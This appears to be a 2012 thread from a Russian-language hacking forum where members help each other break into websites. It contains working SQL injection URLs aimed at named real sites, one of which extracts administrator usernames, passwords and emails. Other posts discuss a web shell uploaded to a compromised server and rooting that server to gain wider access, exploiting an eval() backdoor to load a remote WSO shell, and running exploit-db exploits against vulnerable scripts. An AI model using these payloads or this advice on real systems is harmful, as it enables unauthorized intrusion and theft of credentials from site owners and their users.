Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    это значит что passwd Не каталог а файл, и тебе срочно надо курить книжку по linux. смекаешь?

    http://0214.by/catalog.php?id=130+and+0+union+select+1,version(),3,4,5,6,7,8,9,10--+

    внимательнее. смотри в тайтл
     
    _________________________
    #21401 Konqi, 16 Nov 2012
    Last edited: 16 Nov 2012
  2. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    and 1
    and 0

    такая конструкция работает не во всех СУБД

    лучше and 1=1 / and 1=0


    для string (MySQL)

    SELECT * FROM `products` WHERE 'antichat' (empty set)
    SELECT * FROM `products` WHERE 'antichat'='antichat' (true)
     
    _________________________
  3. avegolove

    avegolove Banned

    Joined:
    3 Jun 2012
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    Дело в том что я залил шелл в раздел banners, но не могу перейти ни в какой раздел кроме этого, так-как ограничены права. Я слышал что можно залить файл htaccess прописав что-то и другие папки будут иметь полные права. Так ли это или есть другие способы открыть полные права на другие разделы?
     
  4. vaddd

    vaddd Member

    Joined:
    6 Jan 2009
    Messages:
    140
    Likes Received:
    19
    Reputations:
    9
    http://lakiauto.ee/templates/artikkel.php?KatID=100&ArtID=0%20union%20select%201,2,concat%280x3c696e6a5f646174613e,table_name,0x3c2f696e6a5f646174613e%29,4,5,6,7,8,9,10,11,12,13%20from%20information_schema.tables%20limit%2029,1

    http://lakiauto.ee/templates/artikkel.php?KatID=100&ArtID=0%20union%20select%201,2,concat%28user,0x3a,pass,0x3a,email%29,4,5,6,7,8,9,10,11,12,13%20from%20zp_administrators%20limit%200,1

    WTF?
     
  5. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    ограниченные права на сервере? так как ты хочешь поднять права посредством .htaccces? тебе рутать надо а не htaccess заливать

    читаем статью нолика. несколько раз.
     
    _________________________
  6. avegolove

    avegolove Banned

    Joined:
    3 Jun 2012
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    Ограниченные а как можно поднять права?
     
  7. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    тебе ж сказали, рутать
     
  8. seozone

    seozone Member

    Joined:
    11 Sep 2012
    Messages:
    30
    Likes Received:
    7
    Reputations:
    0
    непойму, как юзать сплойты с http://www.exploit-db.com
     
  9. Prosta4ok

    Prosta4ok New Member

    Joined:
    25 Oct 2012
    Messages:
    61
    Likes Received:
    0
    Reputations:
    0
    конкретизируй свой вопрос.. там много разных сплоитов, на разных языках
     
  10. tester_new

    tester_new Elder - Старейшина

    Joined:
    12 Feb 2012
    Messages:
    300
    Likes Received:
    45
    Reputations:
    24
    Python:
    ./exploit.py -some key
    C/C++
    gcc –o exploit exploit.c #это очень грубый пример :)
    читай про gcc компилятор
     
  11. seozone

    seozone Member

    Joined:
    11 Sep 2012
    Messages:
    30
    Likes Received:
    7
    Reputations:
    0
    например, http://www.exploit-db.com/exploits/22766/
     
  12. Prosta4ok

    Prosta4ok New Member

    Joined:
    25 Oct 2012
    Messages:
    61
    Likes Received:
    0
    Reputations:
    0
    там просто SQLi через GET запрос и перечислены уязвимые переменные
     
  13. seozone

    seozone Member

    Joined:
    11 Sep 2012
    Messages:
    30
    Likes Received:
    7
    Reputations:
    0
    покажи пример в пм)
     
  14. vaddd

    vaddd Member

    Joined:
    6 Jan 2009
    Messages:
    140
    Likes Received:
    19
    Reputations:
    9
    можно линк? не могу найти...
     
  15. justonline

    justonline network ninja

    Joined:
    27 Jul 2011
    Messages:
    499
    Likes Received:
    60
    Reputations:
    53
    Есть форма добавления объявления. Вставляю кавычку в пост запрос и получаю.
    если делаю так '+order+by+2+--+ пишет -
    Пробовал без кавычки определить кол-во полей, но Проблема в том, что после пост запроса подгружается другая страница, которая возникает при правильном запросе.
    Что попробовать, как быть?

    p.s. Корыстных целей не преследую, ресурс закрытый и направленности совсем не интересная широкой публике. Бага будет сдана сразу админу.
     
  16. VY_CMa

    VY_CMa Green member

    Joined:
    6 Jan 2012
    Messages:
    917
    Likes Received:
    492
    Reputations:
    724
    _________________________
    #21416 VY_CMa, 18 Nov 2012
    Last edited: 18 Nov 2012
  17. justonline

    justonline network ninja

    Joined:
    27 Jul 2011
    Messages:
    499
    Likes Received:
    60
    Reputations:
    53
    точно) что-то мой пияный моск не сообразил, что тут запись а не select)
     
  18. Prosta4ok

    Prosta4ok New Member

    Joined:
    25 Oct 2012
    Messages:
    61
    Likes Received:
    0
    Reputations:
    0
    так там все расписано, какой еще пример?

    ищешь сайт с уязыимым скрптом, подставляешь
    Code:
    сайт/[path]/view_faq.php?question=-4+AND+1=2+UNION+SELECT+0,1,2,version%28%29,4,5--
    если показывает версию БД знач все пучком и можно крутить скулю дальше :)
     
  19. justonline

    justonline network ninja

    Joined:
    27 Jul 2011
    Messages:
    499
    Likes Received:
    60
    Reputations:
    53
    из той же оперы? опять пост, но вот смущает Select, правда почему, интересно он выводится в ошибке...
     
  20. Alert

    Alert New Member

    Joined:
    23 Feb 2011
    Messages:
    6
    Likes Received:
    1
    Reputations:
    0
    Вопрос, как эксплуатировать бекдор eval ($_REQUEST['a']); ?

    Попробовал на локалхосте выполнить http://localhost/test.php?a=http://test1/wso2_pack.php

    выдает ошибку

    соответственно бекдор прописан на 15 строчке
     
Thread Status:
Not open for further replies.